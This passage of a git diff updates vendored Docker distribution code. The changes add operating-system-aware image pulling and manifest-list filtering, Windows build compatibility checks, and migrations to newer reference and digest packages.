+	progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+reference.FamiliarName(p.repo.Named()))
 
 	var (
 		id             digest.Digest
@@ -387,22 +391,22 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 		if p.config.RequireSchema2 {
 			return false, fmt.Errorf("invalid manifest: not schema2")
 		}
-		id, manifestDigest, err = p.pullSchema1(ctx, ref, v)
+		id, manifestDigest, err = p.pullSchema1(ctx, ref, v, os)
 		if err != nil {
 			return false, err
 		}
 	case *schema2.DeserializedManifest:
-		id, manifestDigest, err = p.pullSchema2(ctx, ref, v)
+		id, manifestDigest, err = p.pullSchema2(ctx, ref, v, os)
 		if err != nil {
 			return false, err
 		}
 	case *manifestlist.DeserializedManifestList:
-		id, manifestDigest, err = p.pullManifestList(ctx, ref, v)
+		id, manifestDigest, err = p.pullManifestList(ctx, ref, v, os)
 		if err != nil {
 			return false, err
 		}
 	default:
-		return false, errors.New("unsupported manifest format")
+		return false, invalidManifestFormatError{}
 	}
 
 	progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String())
@@ -413,7 +417,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 			if oldTagID == id {
 				return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id)
 			}
-		} else if err != reference.ErrDoesNotExist {
+		} else if err != refstore.ErrDoesNotExist {
 			return false, err
 		}
 
@@ -433,7 +437,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 	return true, nil
 }
 
-func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) {
+func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Reference, unverifiedManifest *schema1.SignedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) {
 	var verifiedManifest *schema1.Manifest
 	verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref)
 	if err != nil {
@@ -485,7 +489,33 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif
 		descriptors = append(descriptors, layerDescriptor)
 	}
 
-	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput)
+	// The v1 manifest itself doesn't directly contain an OS. However,
+	// the history does, but unfortunately that's a string, so search through
+	// all the history until hopefully we find one which indicates the OS.
+	// supertest2014/nyan is an example of a registry image with schemav1.
+	configOS := runtime.GOOS
+	if system.LCOWSupported() {
+		type config struct {
+			Os string `json:"os,omitempty"`
+		}
+		for _, v := range verifiedManifest.History {
+			var c config
+			if err := json.Unmarshal([]byte(v.V1Compatibility), &c); err == nil {
+				if c.Os != "" {
+					configOS = c.Os
+					break
+				}
+			}
+		}
+	}
+
+	// Early bath if the requested OS doesn't match that of the configuration.
+	// This avoids doing the download, only to potentially fail later.
+	if !strings.EqualFold(configOS, requestedOS) {
+		return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configOS, requestedOS)
+	}
+
+	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, configOS, descriptors, p.config.ProgressOutput)
 	if err != nil {
 		return "", "", err
 	}
@@ -506,7 +536,7 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif
 	return imageID, manifestDigest, nil
 }
 
-func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) {
+func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) {
 	manifestDigest, err = schema2ManifestDigest(ref, mfst)
 	if err != nil {
 		return "", "", err
@@ -536,15 +566,18 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s
 	}
 
 	configChan := make(chan []byte, 1)
-	errChan := make(chan error, 1)
+	configErrChan := make(chan error, 1)
+	layerErrChan := make(chan error, 1)
+	downloadsDone := make(chan struct{})
 	var cancel func()
 	ctx, cancel = context.WithCancel(ctx)
+	defer cancel()
 
 	// Pull the image config
 	go func() {
 		configJSON, err := p.pullSchema2Config(ctx, target.Digest)
 		if err != nil {
-			errChan <- ImageConfigPullError{Err: err}
+			configErrChan <- ImageConfigPullError{Err: err}
 			cancel()
 			return
 		}
@@ -552,9 +585,11 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s
 	}()
 
 	var (
-		configJSON       []byte        // raw serialized image config
-		downloadedRootFS *image.RootFS // rootFS from registered layers
-		configRootFS     *image.RootFS // rootFS from configuration
+		configJSON       []byte          // raw serialized image config
+		downloadedRootFS *image.RootFS   // rootFS from registered layers
+		configRootFS     *image.RootFS   // rootFS from configuration
+		release          func()          // release resources from rootFS download
+		configPlatform   *specs.Platform // for LCOW when registering downloaded layers
 	)
 
 	// https://github.com/docker/docker/issues/24766 - Err on the side of caution,
@@ -566,52 +601,81 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s
 	// check to block Windows images being pulled on Linux is implemented, it
 	// may be necessary to perform the same type of serialisation.
 	if runtime.GOOS == "windows" {
-		configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan)
+		configJSON, configRootFS, configPlatform, err = receiveConfig(p.config.ImageStore, configChan, configErrChan)
 		if err != nil {
 			return "", "", err
 		}
-
 		if configRootFS == nil {
 			return "", "", errRootFSInvalid
 		}
+		if err := checkImageCompatibility(configPlatform.OS, configPlatform.OSVersion); err != nil {
+			return "", "", err
+		}
+
+		if len(descriptors) != len(configRootFS.DiffIDs) {
+			return "", "", errRootFSMismatch
+		}
+
+		// Early bath if the requested OS doesn't match that of the configuration.
+		// This avoids doing the download, only to potentially fail later.
+		if !strings.EqualFold(configPlatform.OS, requestedOS) {
+			return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configPlatform.OS, requestedOS)
+		}
+
+		// Populate diff ids in descriptors to avoid downloading foreign layers
+		// which have been side loaded
+		for i := range descriptors {
+			descriptors[i].(*v2LayerDescriptor).diffID = configRootFS.DiffIDs[i]
+		}
 	}
 
 	if p.config.DownloadManager != nil {
-		downloadRootFS := *image.NewRootFS()
-		rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput)
-		if err != nil {
-			if configJSON != nil {
-				// Already received the config
-				return "", "", err
-			}
-			select {
-			case err = <-errChan:
-				return "", "", err
-			default:
-				cancel()
-				select {
-				case <-configChan:
-				case <-errChan:
-				}
-				return "", "", err
+		go func() {
+			var (
+				err    error
+				rootFS image.RootFS
+			)
+			downloadRootFS := *image.NewRootFS()
+			rootFS, release, err = p.config.DownloadManager.Download(ctx, downloadRootFS, requestedOS, descriptors, p.config.ProgressOutput)
+			if err != nil {
+				// Intentionally do not cancel the config download here
+				// as the error from config download (if there is one)
+				// is more interesting than the layer download error
+				layerErrChan <- err
+				return
 			}
-		}
-		if release != nil {
-			defer release()
-		}
 
-		downloadedRootFS = &rootFS
+			downloadedRootFS = &rootFS
+			close(downloadsDone)
+		}()
+	} else {
+		// We have nothing to download
+		close(downloadsDone)
 	}
 
 	if configJSON == nil {
-		configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan)
+		configJSON, configRootFS, _, err = receiveConfig(p.config.ImageStore, configChan, configErrChan)
+		if err == nil && configRootFS == nil {
+			err = errRootFSInvalid
+		}
 		if err != nil {
+			cancel()
+			select {
+			case <-downloadsDone:
+			case <-layerErrChan:
+			}
 			return "", "", err
 		}
+	}
 
-		if configRootFS == nil {
-			return "", "", errRootFSInvalid
-		}
+	select {
+	case <-downloadsDone:
+	case err = <-layerErrChan:
+		return "", "", err
+	}
+
+	if release != nil {
+		defer release()
 	}
 
 	if downloadedRootFS != nil {
@@ -637,42 +701,50 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s
 	return imageID, manifestDigest, nil
 }
 
-func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) {
+func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, *specs.Platform, error) {
 	select {
 	case configJSON := <-configChan:
 		rootfs, err := s.RootFSFromConfig(configJSON)
 		if err != nil {
-			return nil, nil, err
+			return nil, nil, nil, err
 		}
-		return configJSON, rootfs, nil
+		platform, err := s.PlatformFromConfig(configJSON)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+		return configJSON, rootfs, platform, nil
 	case err := <-errChan:
-		return nil, nil, err
+		return nil, nil, nil, err
 		// Don't need a case for ctx.Done in the select because cancellation
 		// will trigger an error in p.pullSchema2ImageConfig.
 	}
 }
 
 // pullManifestList handles "manifest lists" which point to various
-// platform-specifc manifests.
-func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) {
+// platform-specific manifests.
+func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList, os string) (id digest.Digest, manifestListDigest digest.Digest, err error) {
 	manifestListDigest, err = schema2ManifestDigest(ref, mfstList)
 	if err != nil {
 		return "", "", err
 	}
 
-	var manifestDigest digest.Digest
-	for _, manifestDescriptor := range mfstList.Manifests {
-		// TODO(aaronl): The manifest list spec supports optional
-		// "features" and "variant" fields. These are not yet used.
-		// Once they are, their values should be interpreted here.
-		if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS {
-			manifestDigest = manifestDescriptor.Digest
-			break
-		}
+	logrus.Debugf("%s resolved to a manifestList object with %d entries; looking for a %s/%s match", ref, len(mfstList.Manifests), os, runtime.GOARCH)
+
+	manifestMatches := filterManifests(mfstList.Manifests, os)
+
+	if len(manifestMatches) == 0 {
+		errMsg := fmt.Sprintf("no matching manifest for %s/%s in the manifest list entries", os, runtime.GOARCH)
+		logrus.Debugf(errMsg)
+		return "", "", errors.New(errMsg)
 	}
 
-	if manifestDigest == "" {
-		return "", "", errors.New("no supported platform found in manifest list")
+	if len(manifestMatches) > 1 {
+		logrus.Debugf("found multiple matches in manifest list, choosing best match %s", manifestMatches[0].Digest.String())
+	}
+	manifestDigest := manifestMatches[0].Digest
+
+	if err := checkImageCompatibility(manifestMatches[0].Platform.OS, manifestMatches[0].Platform.OSVersion); err != nil {
+		return "", "", err
 	}
 
 	manSvc, err := p.repo.Manifests(ctx)
@@ -692,12 +764,12 @@ func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mf
 
 	switch v := manifest.(type) {
 	case *schema1.SignedManifest:
-		id, _, err = p.pullSchema1(ctx, manifestRef, v)
+		id, _, err = p.pullSchema1(ctx, manifestRef, v, os)
 		if err != nil {
 			return "", "", err
 		}
 	case *schema2.DeserializedManifest:
-		id, _, err = p.pullSchema2(ctx, manifestRef, v)
+		id, _, err = p.pullSchema2(ctx, manifestRef, v, os)
 		if err != nil {
 			return "", "", err
 		}
@@ -716,10 +788,7 @@ func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (c
 	}
 
 	// Verify image config digest
-	verifier, err := digest.NewDigestVerifier(dgst)
-	if err != nil {
-		return nil, err
-	}
+	verifier := dgst.Verifier()
 	if _, err := verifier.Write(configJSON); err != nil {
 		return nil, err
 	}
@@ -742,10 +811,7 @@ func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (dig
 
 	// If pull by digest, then verify the manifest digest.
 	if digested, isDigested := ref.(reference.Canonical); isDigested {
-		verifier, err := digest.NewDigestVerifier(digested.Digest())
-		if err != nil {
-			return "", err
-		}
+		verifier := digested.Digest().Verifier()
 		if _, err := verifier.Write(canonical); err != nil {
 			return "", err
 		}
@@ -793,15 +859,12 @@ func allowV1Fallback(err error) error {
 	return err
 }
 
-func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) {
+func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Reference) (m *schema1.Manifest, err error) {
 	// If pull by digest, then verify the manifest digest. NOTE: It is
 	// important to do this first, before any other content validation. If the
 	// digest cannot be verified, don't even bother with those other things.
 	if digested, isCanonical := ref.(reference.Canonical); isCanonical {
-		verifier, err := digest.NewDigestVerifier(digested.Digest())
-		if err != nil {
-			return nil, err
-		}
+		verifier := digested.Digest().Verifier()
 		if _, err := verifier.Write(signedManifest.Canonical); err != nil {
 			return nil, err
 		}
@@ -814,13 +877,13 @@ func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference
 	m = &signedManifest.Manifest
 
 	if m.SchemaVersion != 1 {
-		return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String())
+		return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, reference.FamiliarString(ref))
 	}
 	if len(m.FSLayers) != len(m.History) {
-		return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String())
+		return nil, fmt.Errorf("length of history not equal to number of layers for %q", reference.FamiliarString(ref))
 	}
 	if len(m.FSLayers) == 0 {
-		return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String())
+		return nil, fmt.Errorf("no FSLayers in manifest for %q", reference.FamiliarString(ref))
 	}
 	return m, nil
 }
@@ -866,7 +929,7 @@ func fixManifestLayers(m *schema1.Manifest) error {
 			m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...)
 			m.History = append(m.History[:i], m.History[i+1:]...)
 		} else if imgs[i].Parent != imgs[i+1].ID {
-			return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent)
+			return fmt.Errorf("invalid parent ID. Expected %v, got %v", imgs[i+1].ID, imgs[i].Parent)
 		}
 	}
 
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go
index b745642e3b..ca3470c8cf 100644
--- a/vendor/github.com/docker/docker/distribution/pull_v2_test.go
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go
@@ -1,4 +1,4 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
 	"encoding/json"
@@ -8,9 +8,11 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema1"
-	"github.com/docker/docker/reference"
+	"github.com/docker/distribution/reference"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 // TestFixManifestLayers checks that fixManifestLayers removes a duplicate
@@ -102,9 +104,8 @@ func TestFixManifestLayersBadParent(t *testing.T) {
 		},
 	}
 
-	if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") {
-		t.Fatalf("expected an invalid parent ID error from fixManifestLayers")
-	}
+	err := fixManifestLayers(&duplicateLayerManifest)
+	assert.Check(t, is.ErrorContains(err, "invalid parent ID"))
 }
 
 // TestValidateManifest verifies the validateManifest function
@@ -113,7 +114,7 @@ func TestValidateManifest(t *testing.T) {
 	if runtime.GOOS == "windows" {
 		t.Skip("Needs fixing on Windows")
 	}
-	expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd")
+	expectedDigest, err := reference.ParseNormalizedNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd")
 	if err != nil {
 		t.Fatal("could not parse reference")
 	}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go
index 45a7a0c150..0be8a03242 100644
--- a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go
@@ -1,13 +1,34 @@
 // +build !windows
 
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
+	"runtime"
+
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/context"
+	"github.com/docker/distribution/manifest/manifestlist"
+	"github.com/sirupsen/logrus"
 )
 
 func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) {
 	blobs := ld.repo.Blobs(ctx)
 	return blobs.Open(ctx, ld.digest)
 }
+
+func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor {
+	var matches []manifestlist.ManifestDescriptor
+	for _, manifestDescriptor := range manifests {
+		if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os {
+			matches = append(matches, manifestDescriptor)
+
+			logrus.Debugf("found match for %s/%s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.MediaType, manifestDescriptor.Digest.String())
+		}
+	}
+	return matches
+}
+
+// checkImageCompatibility is a Windows-specific function. No-op on Linux
+func checkImageCompatibility(imageOS, imageOSVersion string) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go
index aefed86601..432a36119d 100644
--- a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go
@@ -1,16 +1,22 @@
-// +build windows
-
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
+	"errors"
+	"fmt"
 	"net/http"
 	"os"
+	"runtime"
+	"sort"
+	"strconv"
+	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/context"
+	"github.com/docker/distribution/manifest/manifestlist"
 	"github.com/docker/distribution/manifest/schema2"
 	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
 var _ distribution.Describable = &v2LayerDescriptor{}
@@ -23,20 +29,28 @@ func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor {
 }
 
 func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) {
+	blobs := ld.repo.Blobs(ctx)
+	rsc, err := blobs.Open(ctx, ld.digest)
+
 	if len(ld.src.URLs) == 0 {
-		blobs := ld.repo.Blobs(ctx)
-		return blobs.Open(ctx, ld.digest)
+		return rsc, err
 	}
 
-	var (
-		err error
-		rsc distribution.ReadSeekCloser
-	)
+	// We're done if the registry has this blob.
+	if err == nil {
+		// Seek does an HTTP GET.  If it succeeds, the blob really is accessible.
+		if _, err = rsc.Seek(0, os.SEEK_SET); err == nil {
+			return rsc, nil
+		}
+		rsc.Close()
+	}
 
 	// Find the first URL that results in a 200 result code.
 	for _, url := range ld.src.URLs {
 		logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url)
 		rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil)
+
+		// Seek does an HTTP GET.  If it succeeds, the blob really is accessible.
 		_, err = rsc.Seek(0, os.SEEK_SET)
 		if err == nil {
 			break
@@ -47,3 +61,70 @@ func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekClo
 	}
 	return rsc, err
 }
+
+func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor {
+	osVersion := ""
+	if os == "windows" {
+		version := system.GetOSVersion()
+		osVersion = fmt.Sprintf("%d.%d.%d", version.MajorVersion, version.MinorVersion, version.Build)
+		logrus.Debugf("will prefer entries with version %s", osVersion)
+	}
+
+	var matches []manifestlist.ManifestDescriptor
+	for _, manifestDescriptor := range manifests {
+		if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os {
+			matches = append(matches, manifestDescriptor)
+			logrus.Debugf("found match for %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String())
+		} else {
+			logrus.Debugf("ignoring %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String())
+		}
+	}
+	if os == "windows" {
+		sort.Stable(manifestsByVersion{osVersion, matches})
+	}
+	return matches
+}
+
+func versionMatch(actual, expected string) bool {
+	// Check whether the version matches up to the build, ignoring UBR
+	return strings.HasPrefix(actual, expected+".")
+}
+
+type manifestsByVersion struct {
+	version string
+	list    []manifestlist.ManifestDescriptor
+}
+
+func (mbv manifestsByVersion) Less(i, j int) bool {
+	// TODO: Split version by parts and compare
+	// TODO: Prefer versions which have a greater version number
+	// Move compatible versions to the top, with no other ordering changes
+	return versionMatch(mbv.list[i].Platform.OSVersion, mbv.version) && !versionMatch(mbv.list[j].Platform.OSVersion, mbv.version)
+}
+
+func (mbv manifestsByVersion) Len() int {
+	return len(mbv.list)
+}
+
+func (mbv manifestsByVersion) Swap(i, j int) {
+	mbv.list[i], mbv.list[j] = mbv.list[j], mbv.list[i]
+}
+
+// checkImageCompatibility blocks pulling incompatible images based on a later OS build
+// Fixes https://github.com/moby/moby/issues/36184.
+func checkImageCompatibility(imageOS, imageOSVersion string) error {
+	if imageOS == "windows" {
+		hostOSV := system.GetOSVersion()
+		splitImageOSVersion := strings.Split(imageOSVersion, ".") // eg 10.0.16299.nnnn
+		if len(splitImageOSVersion) >= 3 {
+			if imageOSBuild, err := strconv.Atoi(splitImageOSVersion[2]); err == nil {
+				if imageOSBuild > int(hostOSV.Build) {
+					errMsg := fmt.Sprintf("a Windows version %s.%s.%s-based image is incompatible with a %s host", splitImageOSVersion[0], splitImageOSVersion[1], splitImageOSVersion[2], hostOSV.ToString())
+					logrus.Debugf(errMsg)
+					return errors.New(errMsg)
+				}
+			}
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go
index d35bdb103e..eb3bc55974 100644
--- a/vendor/github.com/docker/docker/distribution/push.go
+++ b/vendor/github.com/docker/docker/distribution/push.go
@@ -1,17 +1,17 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
 	"bufio"
 	"compress/gzip"
+	"context"
 	"fmt"
 	"io"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 // Pusher is an interface that abstracts pushing for different API versions.
@@ -64,16 +64,16 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo
 		return err
 	}
 
-	endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname())
+	endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(reference.Domain(repoInfo.Name))
 	if err != nil {
 		return err
 	}
 
-	progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName())
+	progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to repository [%s]", repoInfo.Name.Name())
 
-	associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo)
+	associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo.Name)
 	if len(associations) == 0 {
-		return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name())
+		return fmt.Errorf("An image does not exist locally with the tag: %s", reference.FamiliarName(repoInfo.Name))
 	}
 
 	var (
@@ -106,7 +106,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo
 			}
 		}
 
-		logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version)
+		logrus.Debugf("Trying to push %s to %s %s", repoInfo.Name.Name(), endpoint.URL, endpoint.Version)
 
 		pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig)
 		if err != nil {
@@ -126,7 +126,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo
 					}
 					err = fallbackErr.err
 					lastErr = err
-					logrus.Errorf("Attempting next endpoint for push after error: %v", err)
+					logrus.Infof("Attempting next endpoint for push after error: %v", err)
 					continue
 				}
 			}
@@ -135,12 +135,12 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo
 			return err
 		}
 
-		imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push")
+		imagePushConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "push")
 		return nil
 	}
 
 	if lastErr == nil {
-		lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.FullName())
+		lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.Name.Name())
 	}
 	return lastErr
 }
diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go
index 257ac181ec..7bd75e9fe6 100644
--- a/vendor/github.com/docker/docker/distribution/push_v1.go
+++ b/vendor/github.com/docker/docker/distribution/push_v1.go
@@ -1,11 +1,11 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"fmt"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/client/transport"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/dockerversion"
@@ -15,9 +15,10 @@ import (
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
 type v1Pusher struct {
@@ -38,14 +39,10 @@ func (p *v1Pusher) Push(ctx context.Context) error {
 	tr := transport.NewTransport(
 		// TODO(tiborvass): was NoTimeout
 		registry.NewTransport(tlsConfig),
-		registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
+		registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
 	)
 	client := registry.HTTPClient(tr)
-	v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
-	if err != nil {
-		logrus.Debugf("Could not get v1 endpoint: %v", err)
-		return fallbackError{err: err}
-	}
+	v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
 	p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint)
 	if err != nil {
 		// TODO(dmcgowan): Check if should fallback
@@ -118,10 +115,10 @@ type v1DependencyImage struct {
 	v1ImageCommon
 }
 
-func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) {
+func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) *v1DependencyImage {
 	v1ID := digest.Digest(l.ChainID()).Hex()
 
-	config := ""
+	var config string
 	if parent != nil {
 		config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID())
 	} else {
@@ -133,7 +130,7 @@ func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1Dependen
 			config: []byte(config),
 			layer:  l,
 		},
-	}, nil
+	}
 }
 
 // Retrieve the all the images to be uploaded in the correct order
@@ -214,7 +211,10 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch
 
 	topLayerID := img.RootFS.ChainID()
 
-	pl, err := p.config.LayerStore.Get(topLayerID)
+	if !system.IsOSSupported(img.OperatingSystem()) {
+		return nil, system.ErrNotSupportedOperatingSystem
+	}
+	pl, err := p.config.LayerStores[img.OperatingSystem()].Get(topLayerID)
 	*referencedLayers = append(*referencedLayers, pl)
 	if err != nil {
 		return nil, fmt.Errorf("failed to get top layer from image: %v", err)
@@ -227,10 +227,7 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch
 	}
 	l := lsl.Layer
 
-	dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen)
-	if err != nil {
-		return nil, err
-	}
+	dependencyImages, parent := generateDependencyImages(l.Parent(), dependenciesSeen)
 
 	topImage, err := newV1TopImage(imgID, img, l, parent)
 	if err != nil {
@@ -242,32 +239,29 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch
 	return
 }
 
-func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) {
+func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage) {
 	if l == nil {
-		return nil, nil, nil
+		return nil, nil
 	}
 
-	imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen)
+	imageListForThisTag, parent = generateDependencyImages(l.Parent(), dependenciesSeen)
 
 	if dependenciesSeen != nil {
 		if dependencyImage, present := dependenciesSeen[l.ChainID()]; present {
 			// This layer is already on the list, we can ignore it
 			// and all its parents.
-			return imageListForThisTag, dependencyImage, nil
+			return imageListForThisTag, dependencyImage
 		}
 	}
 
-	dependencyImage, err := newV1DependencyImage(l, parent)
-	if err != nil {
-		return nil, nil, err
-	}
+	dependencyImage := newV1DependencyImage(l, parent)
 	imageListForThisTag = append(imageListForThisTag, dependencyImage)
 
